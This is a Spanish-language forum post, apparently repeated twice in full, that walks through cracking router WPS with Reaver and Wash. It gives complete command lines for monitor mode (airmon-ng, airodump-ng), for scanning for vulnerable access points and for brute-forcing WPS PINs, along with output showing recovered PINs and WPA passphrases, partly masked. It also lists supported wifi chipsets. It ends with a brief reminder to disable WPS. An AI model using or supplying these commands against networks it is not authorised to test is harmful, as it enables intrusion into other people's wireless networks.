ba6tata4
New Member
Buenas:
Hemos estado hablando del tema pero no hemos hecho ningun post :silbar:
Reaver lo podeis descargar aqui http://code.google.com/p/reaver-wps/downloads/list o bien usarlo con wifiway (que ya lo lleva incorporado)
1.- Walsh --> Lo que hará es detectar qué APs pudiesen ser vulnerables (actualmente es wash sin "l")
Walsh v1.3
Required Arguments:
-i, --interface=<iface> Interface to capture packets on
-f, --file [FILE1 FILE2 FILE3 ...] Read packets from capture files
Optional Arguments:
-c, --channel=<num> Channel to listen on [auto]
-o, --out-file=<file> Write data to file
-n, --probes=<num> Maximum number of probes to send to each AP in scan mode [15]
-C, --ignore-fcs Ignore frame checksum errors
-5, --5ghz Use 5GHz 802.11 channels
-s, --scan Use scan mode
-u, --survey Use survey mode [default]
-h, --help Show help
Ejemplo de uso: walsh -i mon0 (actualmente sería wash -i mon0)
Scanning for supported APs...
00:19:15:XXXXXXXX WLAN_5XXX
00:19:15:XXXXXXXX WLAN_3XXX
X0:21:B7:XXXXXXXX XXXXXXXXX
64:68:0C:XXXXXXXX WLAN_XXXX
C4:3D:C7:XXXXXXXX ONOXXX
Lo debeis parar con control+c
2.- reaver: Sirve para lanzar los PINS e ir probando. Puede llegar a tardar muchas horas (como 11 que tardé yo, por ejemplo)
Uso: reaver -i mon0 -b C4:3D:C7:XXXXXXXX -vv
Resultado
94.67% complete @ 2012-01-08 08:34:36 (4 seconds/attempt)
WPS PIN: '5XXXXXXX'
WPA PSK: '1XXXXXXXXX'
AP SSID: 'ONOXXXX'
Así que ya sabeis que debeis deshabilitar el WPS de vuestro router
Un saludo
ChimoC
P.D.: Si tecleais
reaver --man
Os saldrán más cosillas
-------------------------------------------------------------------
CHIPSETS SOPORTADOS:
Atheros AR2425 (ath5k)
Atheros AR5212
Atheros AR5213A
Atheros AR542x
Atheros AR9271 (Perfecto)
rtl8187L
rtl8187B
rtl8188ru
rtl8192cu
carl19170
ipw2000
rt2800pci
Intel 3945ABG
Intel 5100
iwl3954
iwl4965
zd1211rw
CHIPSETS CON SOPORTE PARCIAL:
ath5k
iwlagn
rtl2800usb (con compat-wireless)
b43 (Broadcom BCM4312 card)
rt73 (con driver rt2501usb)
rt2800usb (con compat-wireless-2011-12-30)
rtl819x
iwl4965
rtl8188ru
rtl8192cu
CHIPSETS NO SOPORTADOS:
iwl4965
RT3070L
Netgear WG111v3
rt2800usb (RTL3070)
rt2500
rt2570
Ipw2200
RT73usb
BCM4322
zd1211usb
--------------------------------------------------------------------
Un ejemplo del user GARCAD
Se puede usar el binario de walsh 1.3 en wifiway 3.4 perfectamente desde el directorio por ejemplo /root al mismo tiempo que tener instalada la version 1.4
Para los que les quede duda, mas rapido en mi caso imposible 5 segundos.
Código:
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
[+] Waiting for beacon from XX:XX:XX:XX:XX:XX
[+] Switching mon0 to channel 1
[+] Associated with XX:XX:XX:XX:XX:XX (ESSID: XXXX)
[+] Trying pin XXXXXXXX
[+] Sending EAPOL START request
[+] Sending identity response
[+] Sending M2 message
[+] Sending M4 message
[+] Sending M6 message
[!] WPS transaction failed, re-trying last pin
[+] Key cracked in 5 seconds
[+] WPS PIN: 'XXXXXXXX'
[+] WPA PSK: 'nXXXXXXXXXXXXXX0'
[+] AP SSID: 'XXXXXXXX'
[+] Nothing done, nothing to save.
Yo el proceso lo hago del siguiente modo.
Pongo en modo monitor el adaptador
Código:
# airmon-ng start wlan0
Me crea un clon mon0
Necesito saber el canal que emite mi router por lo que utilizo el siguiente comando para capturar el trafico con airodump-ng y visualizar el canal
Código:
# airodump-ng mon0
Cuando se en el canal que emite, cierro la ventana y sigo con...
Código:
# airodump-ng mon0 -w wps-test --beacons --chanel NUMERO --bssid ELQUETENGO
Cuando termina el proceso de capturar abrimos con Wireshark el archivo wps-test.cab.
Yo ya se que lo tengo activado, pero como han explicado como mirarlo con Wireskark sigo con el mismo rol.
Buscamos un broadcast de nuestro router como se puede ver en la siguiente imagen.
Localizamos WPS y si esta activo o no lo esta.
Si Wifi Protected Setup visualizamos 0x02 esta activo se puede mirar si es vulnerable, si vemos 0x01 esta en modo manual, desactivado.
Como esta activada la protección con Wireskark en el archivo *.cap podemos ver 0x02 puedo empezar el ataque con el reaver.
Código:
# reaver -i mon0 -b BSSIDELQUETENGAS -c ELCANLAQUEEMITES -e ESSIDELQUETENGAS -d 15 -vv
original post http://foro.elhacker.net/wireless_e...idad_de_wpa_por_wps_habilitado-t350507.0.html
Salu2
Hemos estado hablando del tema pero no hemos hecho ningun post :silbar:
Reaver lo podeis descargar aqui http://code.google.com/p/reaver-wps/downloads/list o bien usarlo con wifiway (que ya lo lleva incorporado)
1.- Walsh --> Lo que hará es detectar qué APs pudiesen ser vulnerables (actualmente es wash sin "l")
Walsh v1.3
Required Arguments:
-i, --interface=<iface> Interface to capture packets on
-f, --file [FILE1 FILE2 FILE3 ...] Read packets from capture files
Optional Arguments:
-c, --channel=<num> Channel to listen on [auto]
-o, --out-file=<file> Write data to file
-n, --probes=<num> Maximum number of probes to send to each AP in scan mode [15]
-C, --ignore-fcs Ignore frame checksum errors
-5, --5ghz Use 5GHz 802.11 channels
-s, --scan Use scan mode
-u, --survey Use survey mode [default]
-h, --help Show help
Ejemplo de uso: walsh -i mon0 (actualmente sería wash -i mon0)
Scanning for supported APs...
00:19:15:XXXXXXXX WLAN_5XXX
00:19:15:XXXXXXXX WLAN_3XXX
X0:21:B7:XXXXXXXX XXXXXXXXX
64:68:0C:XXXXXXXX WLAN_XXXX
C4:3D:C7:XXXXXXXX ONOXXX
Lo debeis parar con control+c
2.- reaver: Sirve para lanzar los PINS e ir probando. Puede llegar a tardar muchas horas (como 11 que tardé yo, por ejemplo)
Uso: reaver -i mon0 -b C4:3D:C7:XXXXXXXX -vv
Resultado
94.67% complete @ 2012-01-08 08:34:36 (4 seconds/attempt)
WPS PIN: '5XXXXXXX'
WPA PSK: '1XXXXXXXXX'
AP SSID: 'ONOXXXX'
Así que ya sabeis que debeis deshabilitar el WPS de vuestro router
Un saludo
ChimoC
P.D.: Si tecleais
reaver --man
Os saldrán más cosillas
-------------------------------------------------------------------
CHIPSETS SOPORTADOS:
Atheros AR2425 (ath5k)
Atheros AR5212
Atheros AR5213A
Atheros AR542x
Atheros AR9271 (Perfecto)
rtl8187L
rtl8187B
rtl8188ru
rtl8192cu
carl19170
ipw2000
rt2800pci
Intel 3945ABG
Intel 5100
iwl3954
iwl4965
zd1211rw
CHIPSETS CON SOPORTE PARCIAL:
ath5k
iwlagn
rtl2800usb (con compat-wireless)
b43 (Broadcom BCM4312 card)
rt73 (con driver rt2501usb)
rt2800usb (con compat-wireless-2011-12-30)
rtl819x
iwl4965
rtl8188ru
rtl8192cu
CHIPSETS NO SOPORTADOS:
iwl4965
RT3070L
Netgear WG111v3
rt2800usb (RTL3070)
rt2500
rt2570
Ipw2200
RT73usb
BCM4322
zd1211usb
--------------------------------------------------------------------
Un ejemplo del user GARCAD
Se puede usar el binario de walsh 1.3 en wifiway 3.4 perfectamente desde el directorio por ejemplo /root al mismo tiempo que tener instalada la version 1.4
Para los que les quede duda, mas rapido en mi caso imposible 5 segundos.
Código:
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
[+] Waiting for beacon from XX:XX:XX:XX:XX:XX
[+] Switching mon0 to channel 1
[+] Associated with XX:XX:XX:XX:XX:XX (ESSID: XXXX)
[+] Trying pin XXXXXXXX
[+] Sending EAPOL START request
[+] Sending identity response
[+] Sending M2 message
[+] Sending M4 message
[+] Sending M6 message
[!] WPS transaction failed, re-trying last pin
[+] Key cracked in 5 seconds
[+] WPS PIN: 'XXXXXXXX'
[+] WPA PSK: 'nXXXXXXXXXXXXXX0'
[+] AP SSID: 'XXXXXXXX'
[+] Nothing done, nothing to save.
Yo el proceso lo hago del siguiente modo.
Pongo en modo monitor el adaptador
Código:
# airmon-ng start wlan0
Me crea un clon mon0
Necesito saber el canal que emite mi router por lo que utilizo el siguiente comando para capturar el trafico con airodump-ng y visualizar el canal
Código:
# airodump-ng mon0
Cuando se en el canal que emite, cierro la ventana y sigo con...
Código:
# airodump-ng mon0 -w wps-test --beacons --chanel NUMERO --bssid ELQUETENGO
Cuando termina el proceso de capturar abrimos con Wireshark el archivo wps-test.cab.
Yo ya se que lo tengo activado, pero como han explicado como mirarlo con Wireskark sigo con el mismo rol.
Buscamos un broadcast de nuestro router como se puede ver en la siguiente imagen.
Localizamos WPS y si esta activo o no lo esta.
Si Wifi Protected Setup visualizamos 0x02 esta activo se puede mirar si es vulnerable, si vemos 0x01 esta en modo manual, desactivado.
Como esta activada la protección con Wireskark en el archivo *.cap podemos ver 0x02 puedo empezar el ataque con el reaver.
Código:
# reaver -i mon0 -b BSSIDELQUETENGAS -c ELCANLAQUEEMITES -e ESSIDELQUETENGAS -d 15 -vv
original post http://foro.elhacker.net/wireless_e...idad_de_wpa_por_wps_habilitado-t350507.0.html
Salu2